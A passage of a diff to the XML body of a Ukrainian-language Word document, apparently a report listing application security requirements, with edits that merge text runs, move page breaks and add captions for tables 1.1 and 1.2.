-        <w:t xml:space="preserve"> і мають причину бути в додатку</w:t>
+        <w:t>аступним</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> вимог</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>ам наведеним нижче ( таблиця 1.1)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7543,26 +7676,6 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t>+ На рівні 2, архітектура була визначена,</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> і код дотримується архітектури</w:t>
-      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7594,7 +7707,29 @@
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="212121"/>
@@ -7602,7 +7737,120 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t>+ На рівні 3, архітектура і дизайн знаходиться в місці, при використанні, і ефективної</w:t>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="212121"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Таблиця 1.1</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -9272,18 +9520,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">язаних з підробкою або фальсифікацією, навмисним </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>викриттям інформації</w:t>
+              <w:t>язаних з підробкою або фальсифікацією, навмисним викриттям інформації</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -9530,7 +9767,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:t>1.7</w:t>
             </w:r>
           </w:p>
@@ -10137,7 +10373,18 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve"> шаром даних,</w:t>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:color w:val="212121"/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:lastRenderedPageBreak/>
+              <w:t>шаром даних,</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -10361,6 +10608,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
+              <w:lastRenderedPageBreak/>
               <w:t>1.10</w:t>
             </w:r>
           </w:p>
@@ -10828,6 +11076,11 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         <w:tabs>
           <w:tab w:val="left" w:pos="916"/>
@@ -10866,47 +11119,16 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>Перевіряється цифров</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ий код відправника повідомлення</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>Перевіряється цифровий код відправника повідомлення.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="16"/>
+        </w:numPr>
         <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         <w:tabs>
           <w:tab w:val="left" w:pos="916"/>
@@ -10945,13 +11167,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>+</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve">Гарантує, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10960,9 +11176,8 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Гарантує, </w:t>
+        </w:rPr>
+        <w:t>що т</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10971,8 +11186,9 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>що т</w:t>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ільки користувачі з певними правами доступу можуть</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10983,7 +11199,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>ільки користувачі з певними правами доступу можуть</w:t>
+        <w:t xml:space="preserve"> виконувати аутентифікацію і </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10994,7 +11210,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve"> виконувати аутентифікацію і </w:t>
+        <w:t xml:space="preserve">при цьому </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11005,9 +11221,31 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t xml:space="preserve">при цьому </w:t>
-      </w:r>
-      <w:r>
+        <w:t>облікові дані транспортуються в безпечному режимі.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:color w:val="2A2A2A"/>
@@ -11016,7 +11254,60 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
           <w:lang w:val="uk-UA"/>
         </w:rPr>
-        <w:t>облікові дані транспортуються в безпечному режимі.</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>А також нижче наведеним ( таблиця 1.2)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="916"/>
+          <w:tab w:val="left" w:pos="1832"/>
+          <w:tab w:val="left" w:pos="2748"/>
+          <w:tab w:val="left" w:pos="3664"/>
+          <w:tab w:val="left" w:pos="4580"/>
+          <w:tab w:val="left" w:pos="5496"/>
+          <w:tab w:val="left" w:pos="6412"/>
+          <w:tab w:val="left" w:pos="7328"/>
+          <w:tab w:val="left" w:pos="8244"/>
+          <w:tab w:val="left" w:pos="9160"/>
+          <w:tab w:val="left" w:pos="10076"/>
+          <w:tab w:val="left" w:pos="10992"/>
+          <w:tab w:val="left" w:pos="11908"/>
+          <w:tab w:val="left" w:pos="12824"/>
+          <w:tab w:val="left" w:pos="13740"/>
+          <w:tab w:val="left" w:pos="14656"/>
+        </w:tabs>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>Таблиця 1.2</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -11667,18 +11958,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t xml:space="preserve">орми, що містять облікові дані не заповнюються </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:lastRenderedPageBreak/>
-              <w:t>додатк</w:t>
+              <w:t>орми, що містять облікові дані не заповнюються додатк</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -11778,7 +12058,6 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:lastRenderedPageBreak/>
               <w:sym w:font="Wingdings" w:char="F0FC"/>
             </w:r>
           </w:p>
@@ -11890,7 +12169,6 @@
                 <w:szCs w:val="28"/>
                 <w